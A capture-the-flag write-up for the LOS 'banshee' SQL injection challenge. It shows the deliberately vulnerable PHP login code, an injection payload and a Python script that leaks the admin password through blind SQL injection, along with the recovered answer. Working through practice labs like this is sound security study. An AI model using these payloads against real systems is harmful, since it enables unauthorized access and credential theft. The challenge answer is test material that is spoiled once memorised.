LOS Lv.39 banshee
banshee
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
query : select id from member where id='admin' and pw=''
<?php
include "./config.php";
login_chk();
$db = sqlite_open("./db/banshee.db");
if(preg_match('/sqlite|member|_/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from member where id='admin' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = sqlite_fetch_array(sqlite_query($db,$query));
if($result['id']) echo "<h2>login success!</h2>";
$query = "select pw from member where id='admin'";
$result = sqlite_fetch_array(sqlite_query($db,$query));
if($result['pw'] === $_GET['pw']) solve("banshee");
highlight_file(__FILE__);
?>
Solution
1
2
sqlite의 information_schema인 sqlite_master에서
값을 뽑아오고 싶었는데 필터링 되어있음.
1
2
3
blind sql injection으로 풀면 됨.
?pw=' or id='admin' and length(pw)=8 --%20
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import requests
url='https://los.rubiya.kr/chall/banshee_ece938c70ea2419a093bb0be9f01a7b1.php'
headers={'Content-Type':'application/x-www-form-urlencoded'}
cookies={'PHPSESSID':'[redacted]'}
pw=''
for i in range(1,9) :
for j in range(48,123) :
payload={'pw' : "' or id='admin' and hex(substr(pw,"+str(i)+",1))=hex('"+chr(j)+"') --"}
res=requests.get(url, headers=headers, params=payload, cookies=cookies)
if "<h2>login success!</h2>" in res.text :
pw+=chr(j)
print("pw : "+pw) # 0313091b
break
print("BANSHEE Clear!")
This post is licensed under CC BY 4.0 by the author.